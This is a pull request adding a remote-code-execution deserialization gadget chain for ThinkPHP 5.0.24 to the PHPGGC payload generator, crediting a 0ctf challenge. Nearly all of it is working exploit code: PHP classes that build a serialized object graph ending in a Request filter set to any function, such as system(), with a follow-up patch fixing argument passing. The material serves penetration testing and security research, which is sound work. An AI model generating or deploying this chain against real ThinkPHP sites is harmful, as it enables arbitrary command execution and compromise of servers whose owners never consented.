### PR TITLE
adding RCE POP chain for ThinkPHP 5.0.24

### DIFF
--- a/gadgetchains/ThinkPHP/RCE/2/chain.php
+++ b/gadgetchains/ThinkPHP/RCE/2/chain.php
@@ -1,0 +1,22 @@
+<?php
+
+namespace GadgetChain\ThinkPHP;
+
+class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = '5.0.24';
+    public static $vector = '__destruct';
+    public static $author = 'kemmio';
+    public static $information = '
+        This chain can only execute any function including system().
+	Shoutout to c014 the 0ctf 2021 challenge creator!
+        See the full writeup for the chain at https://blog.hexens.io/
+    ';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+        return new \think\process\pipes\Windows($function, $parameter);
+    }
+}

--- a/gadgetchains/ThinkPHP/RCE/2/gadgets.php
+++ b/gadgetchains/ThinkPHP/RCE/2/gadgets.php
@@ -45,10 +45,10 @@ namespace think\model\relation{
         protected $query;
         protected $bindAttr = [];
 
-        function __construct(){
+        function __construct($function, $parameter){
             $this->bindAttr = ["no","123"];
             $this->selfRelation = false;
-            $this->query = new Query();
+            $this->query = new Query($function, $parameter);
         }
 
     }
@@ -73,7 +73,7 @@ namespace think{
 
         function __construct($function, $parameter){
             $this->append = ['getError'];
-            $this->error = new HasOne();
+            $this->error = new HasOne($function, $parameter);
             $this->parent = new Output($function, $parameter);
             $this->selfRelation = false;
             $this->query = new Query($function, $parameter);
@@ -90,7 +90,7 @@ namespace think\db{
 
     class Query{
         protected $model;
-        function __construct(){
+        function __construct($function, $parameter){
             $this->model = new Output($function, $parameter);
         }
 

--- a/gadgetchains/ThinkPHP/RCE/2/gadgets.php
+++ b/gadgetchains/ThinkPHP/RCE/2/gadgets.php
@@ -1,0 +1,199 @@
+<?php
+
+namespace think\process\pipes{
+
+    use think\model\Pivot;
+
+    class Pipes{
+
+    }
+
+    class Windows extends Pipes{
+        private $files = [];
+
+        function __construct($function, $parameter){
+            $this->files = [new Pivot($function, $parameter)];
+        }
+
+    }
+
+}
+
+namespace think\model{
+
+    use think\db\Query;
+
+    abstract class Relation{
+
+    }
+
+}
+
+namespace think\model\relation{
+
+    use think\model\Relation;
+
+    use think\db\Query;
+
+    abstract class OneToOne extends Relation{
+
+    }
+
+    class HasOne extends OneToOne{
+
+        protected $selfRelation;
+        protected $query;
+        protected $bindAttr = [];
+
+        function __construct(){
+            $this->bindAttr = ["no","123"];
+            $this->selfRelation = false;
+            $this->query = new Query();
+        }
+
+    }
+}
+
+
+namespace think{
+
+    use think\model\relation\HasOne;
+
+    use think\console\Output;
+
+    use think\db\Query;
+
+    abstract class Model{
+
+        protected $append = [];
+        protected $error;
+        protected $parent;
+        protected $selfRelation;
+        protected $query;
+
+        function __construct($function, $parameter){
+            $this->append = ['getError'];
+            $this->error = new HasOne();
+            $this->parent = new Output($function, $parameter);
+            $this->selfRelation = false;
+            $this->query = new Query($function, $parameter);
+
+        }
+
+    }
+}
+
+
+namespace think\db{
+
+    use think\console\Output;
+
+    class Query{
+        protected $model;
+        function __construct(){
+            $this->model = new Output($function, $parameter);
+        }
+
+    }
+}
+
+
+namespace think\console{
+
+    use think\session\driver\Memcached;
+
+    class Output{
+
+        private $handle = null;
+        protected $styles = [];
+
+        function __construct($function, $parameter){
+            $this->handle = new Memcached($function, $parameter);
+            $this->styles = ['getAttr'];
+        }
+
+    }
+
+}
+
+
+namespace think\session\driver{
+
+    use think\cache\driver\Memcache;
+
+    class Memcached{
+
+        protected $handler = null;
+        protected $config  = [];
+
+        function __construct($function, $parameter){
+            $this->handler = new Memcache($function, $parameter);
+            $this->config = [
+                'host'         => '127.0.0.1', 
+                'port'         => 11211, 
+                'expire'       => 3600, 
+                'timeout'      => 0, 
+                'session_name' => 'HEXENS', 
+                'username'     => '', 
+                'password'     => '', 
+            ];
+        }
+
+    }
+
+}
+
+
+
+namespace think\cache\driver{
+
+    use think\Request;
+
+    class Memcache{
+
+        protected $options = [];
+        protected $handler = null;
+        protected $tag;
+
+        function __construct($function, $parameter){
+            $this->handler = new Request($function, $parameter);
+            $this->options = [
+            'expire'        => 0,
+            'cache_subdir'  => false,
+            'prefix'        => '',
+            'path'          => '',
+            'data_compress' => false,
+            ];
+            $this->tag = true;
+        }
+    }
+
+}
+
+
+
+namespace think{
+
+    class Request{
+
+        protected $get;
+        protected $filter;
+
+        function __construct($function, $parameter){
+            $this->get = ["HEXENS<getAttr>no<" => $parameter];
+            $this->filter = $function;
+        }
+    }
+
+}
+
+
+namespace think\model{
+
+    use think\Model;
+
+    class Pivot extends Model{
+
+    }
+
+}


### PR DESCRIPTION
This is a RCE gadget chain for ThinkPHP 5.0.24, but it can also work for 5.0.4-5.0.24, but is tested only on 5.0.24.
The specifics of the gadget is that it does not use file-write, so you don't need to have writeable directories.
This was discovered in 0ctf finals challenge RevengePHP, so huge shoutout to c014 who should be the initial discoverer of this chain. It can call any function not only system().